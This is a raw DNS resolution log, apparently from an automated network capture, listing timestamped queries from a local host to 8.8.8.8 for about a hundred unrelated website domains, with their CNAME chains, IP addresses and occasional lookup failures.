                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.210974932 CET8.8.8.8192.168.2.50xf397No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.352726936 CET8.8.8.8192.168.2.50x4b64No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.352726936 CET8.8.8.8192.168.2.50x4b64No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.702908993 CET8.8.8.8192.168.2.50xe321No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.702908993 CET8.8.8.8192.168.2.50xe321No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.709394932 CET8.8.8.8192.168.2.50xcbe9No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.709394932 CET8.8.8.8192.168.2.50xcbe9No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722240925 CET8.8.8.8192.168.2.50x88ebNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722240925 CET8.8.8.8192.168.2.50x88ebNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.747286081 CET8.8.8.8192.168.2.50xce5dNo error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.747286081 CET8.8.8.8192.168.2.50xce5dNo error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.046917915 CET8.8.8.8192.168.2.50xaf22No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.058552980 CET8.8.8.8192.168.2.50xf917No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.734935999 CET8.8.8.8192.168.2.50xda2eNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.821686983 CET8.8.8.8192.168.2.50xa24eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.829731941 CET8.8.8.8192.168.2.50xca57No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.912007093 CET8.8.8.8192.168.2.50x3a24No error (0)www.netcr.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.912007093 CET8.8.8.8192.168.2.50x3a24No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.912007093 CET8.8.8.8192.168.2.50x3a24No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.912007093 CET8.8.8.8192.168.2.50x3a24No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.935159922 CET8.8.8.8192.168.2.50x6119No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.935159922 CET8.8.8.8192.168.2.50x6119No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.109704018 CET8.8.8.8192.168.2.50x1685No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.248903036 CET8.8.8.8192.168.2.50xe162No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.300698042 CET8.8.8.8192.168.2.50xd223Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.483906031 CET8.8.8.8192.168.2.50xfbd6No error (0)www.findbc.com13.248.216.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.483906031 CET8.8.8.8192.168.2.50xfbd6No error (0)www.findbc.com76.223.65.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.536900997 CET8.8.8.8192.168.2.50x51c9No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.593971968 CET8.8.8.8192.168.2.50x79d3No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.635991096 CET8.8.8.8192.168.2.50x31aeNo error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.887516975 CET8.8.8.8192.168.2.50xe81cNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.887516975 CET8.8.8.8192.168.2.50xe81cNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.887516975 CET8.8.8.8192.168.2.50xe81cNo error (0)d2kt7vovxa5e81.cloudfront.net13.225.78.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.887516975 CET8.8.8.8192.168.2.50xe81cNo error (0)d2kt7vovxa5e81.cloudfront.net13.225.78.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.887516975 CET8.8.8.8192.168.2.50xe81cNo error (0)d2kt7vovxa5e81.cloudfront.net13.225.78.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.887516975 CET8.8.8.8192.168.2.50xe81cNo error (0)d2kt7vovxa5e81.cloudfront.net13.225.78.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.891627073 CET8.8.8.8192.168.2.50x9f5No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.046544075 CET8.8.8.8192.168.2.50xccbeNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.046544075 CET8.8.8.8192.168.2.50xccbeNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.046544075 CET8.8.8.8192.168.2.50xccbeNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.046544075 CET8.8.8.8192.168.2.50xccbeNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.046544075 CET8.8.8.8192.168.2.50xccbeNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.411442995 CET8.8.8.8192.168.2.50xba0eNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.446605921 CET8.8.8.8192.168.2.50x9f10No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.570655107 CET8.8.8.8192.168.2.50xe411No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.588301897 CET8.8.8.8192.168.2.50xa845No error (0)www.myropcb.com74.208.215.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.850950956 CET8.8.8.8192.168.2.50xe0b8No error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.850950956 CET8.8.8.8192.168.2.50xe0b8No error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.867249966 CET8.8.8.8192.168.2.50x14a9No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.867249966 CET8.8.8.8192.168.2.50x14a9No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.867249966 CET8.8.8.8192.168.2.50x14a9No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.006335974 CET8.8.8.8192.168.2.50x2d96Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.230683088 CET8.8.8.8192.168.2.50x594aNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.230683088 CET8.8.8.8192.168.2.50x594aNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.407555103 CET8.8.8.8192.168.2.50xbf15No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.440802097 CET8.8.8.8192.168.2.50xcac5No error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.495408058 CET8.8.8.8192.168.2.50xbf15No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.761698961 CET8.8.8.8192.168.2.50xdbbfNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.761698961 CET8.8.8.8192.168.2.50xdbbfNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.761698961 CET8.8.8.8192.168.2.50xdbbfNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:16.441445112 CET8.8.8.8192.168.2.50xbf15No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.370487928 CET8.8.8.8192.168.2.50x3c79No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.370738029 CET8.8.8.8192.168.2.50x3755No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.537723064 CET8.8.8.8192.168.2.50xcd98No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.537723064 CET8.8.8.8192.168.2.50xcd98No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.537723064 CET8.8.8.8192.168.2.50xcd98No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.561450005 CET8.8.8.8192.168.2.50x5d3dNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.679981947 CET8.8.8.8192.168.2.50xb26fNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.894243956 CET8.8.8.8192.168.2.50x5231No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.894243956 CET8.8.8.8192.168.2.50x5231No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.988955975 CET8.8.8.8192.168.2.50x3060No error (0)www.wifi4all.nl188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.988955975 CET8.8.8.8192.168.2.50x3060No error (0)www.wifi4all.nl188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.387929916 CET8.8.8.8192.168.2.50x1082No error (0)www.fcwcvt.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.387929916 CET8.8.8.8192.168.2.50x1082No error (0)www.fcwcvt.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.444678068 CET8.8.8.8192.168.2.50x9b30No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.568581104 CET8.8.8.8192.168.2.50x2afcNo error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.274032116 CET8.8.8.8192.168.2.50x785aName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.276182890 CET8.8.8.8192.168.2.50x15b8No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.276182890 CET8.8.8.8192.168.2.50x15b8No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.641026020 CET8.8.8.8192.168.2.50x4230No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.970084906 CET8.8.8.8192.168.2.50x7c78No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.970084906 CET8.8.8.8192.168.2.50x7c78No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:23.395515919 CET8.8.8.8192.168.2.50xd941No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.808522940 CET8.8.8.8192.168.2.50x7304No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.810120106 CET8.8.8.8192.168.2.50x4288No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.810120106 CET8.8.8.8192.168.2.50x4288No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.813308001 CET8.8.8.8192.168.2.50xd3f0Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.818214893 CET8.8.8.8192.168.2.50x331cNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.818214893 CET8.8.8.8192.168.2.50x331cNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.824626923 CET8.8.8.8192.168.2.50x687dNo error (0)www.pdqhomes.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.824626923 CET8.8.8.8192.168.2.50x687dNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.824626923 CET8.8.8.8192.168.2.50x687dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.824626923 CET8.8.8.8192.168.2.50x687dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.836380959 CET8.8.8.8192.168.2.50xfde9No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.836380959 CET8.8.8.8192.168.2.50xfde9No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.836500883 CET8.8.8.8192.168.2.50xbad4No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.836500883 CET8.8.8.8192.168.2.50xbad4No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.837316036 CET8.8.8.8192.168.2.50x3e4fNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.837316036 CET8.8.8.8192.168.2.50x3e4fNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.840586901 CET8.8.8.8192.168.2.50xd5efServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.069297075 CET8.8.8.8192.168.2.50x9401No error (0)www.rs-ag.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.069297075 CET8.8.8.8192.168.2.50x9401No error (0)www.rs-ag.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.075246096 CET8.8.8.8192.168.2.50x5517No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.274784088 CET8.8.8.8192.168.2.50x35d7No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.274784088 CET8.8.8.8192.168.2.50x35d7No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.274784088 CET8.8.8.8192.168.2.50x35d7No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.536302090 CET8.8.8.8192.168.2.50x1fb5No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.536302090 CET8.8.8.8192.168.2.50x1fb5No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.536302090 CET8.8.8.8192.168.2.50x1fb5No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.542152882 CET8.8.8.8192.168.2.50x252cNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.542152882 CET8.8.8.8192.168.2.50x252cNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.542152882 CET8.8.8.8192.168.2.50x252cNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.556565046 CET8.8.8.8192.168.2.50x77feNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.556565046 CET8.8.8.8192.168.2.50x77feNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.556565046 CET8.8.8.8192.168.2.50x77feNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.577183008 CET8.8.8.8192.168.2.50x3354No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.577183008 CET8.8.8.8192.168.2.50x3354No error (0)ghs.googlehosted.com142.250.186.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.673377991 CET8.8.8.8192.168.2.50xee12No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.709961891 CET8.8.8.8192.168.2.50xbdcfNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.346791983 CET8.8.8.8192.168.2.50x1869No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.346791983 CET8.8.8.8192.168.2.50x1869No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.348467112 CET8.8.8.8192.168.2.50x95deNo error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.348467112 CET8.8.8.8192.168.2.50x95deNo error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.348467112 CET8.8.8.8192.168.2.50x95deNo error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.361430883 CET8.8.8.8192.168.2.50xb139No error (0)www.petsfan.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.361430883 CET8.8.8.8192.168.2.50xb139No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.361430883 CET8.8.8.8192.168.2.50xb139No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.361430883 CET8.8.8.8192.168.2.50xb139No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.387406111 CET8.8.8.8192.168.2.50x1f8cNo error (0)www.otena.com99.83.154.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.412976980 CET8.8.8.8192.168.2.50xe8b3Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.540858030 CET8.8.8.8192.168.2.50x838fNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.540858030 CET8.8.8.8192.168.2.50x838fNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.540858030 CET8.8.8.8192.168.2.50x838fNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.545564890 CET8.8.8.8192.168.2.50x499No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.545564890 CET8.8.8.8192.168.2.50x499No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.578468084 CET8.8.8.8192.168.2.50xa1e6No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.578468084 CET8.8.8.8192.168.2.50xa1e6No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.590472937 CET8.8.8.8192.168.2.50xcb37No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.610785007 CET8.8.8.8192.168.2.50x8f7cNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.336416006 CET8.8.8.8192.168.2.50x7377No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.336416006 CET8.8.8.8192.168.2.50x7377No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.420216084 CET8.8.8.8192.168.2.50x9d41No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.422759056 CET8.8.8.8192.168.2.50x84dcName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.442102909 CET8.8.8.8192.168.2.50x85acNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.527002096 CET8.8.8.8192.168.2.50x4183No error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.527002096 CET8.8.8.8192.168.2.50x4183No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.527002096 CET8.8.8.8192.168.2.50x4183No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.527002096 CET8.8.8.8192.168.2.50x4183No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
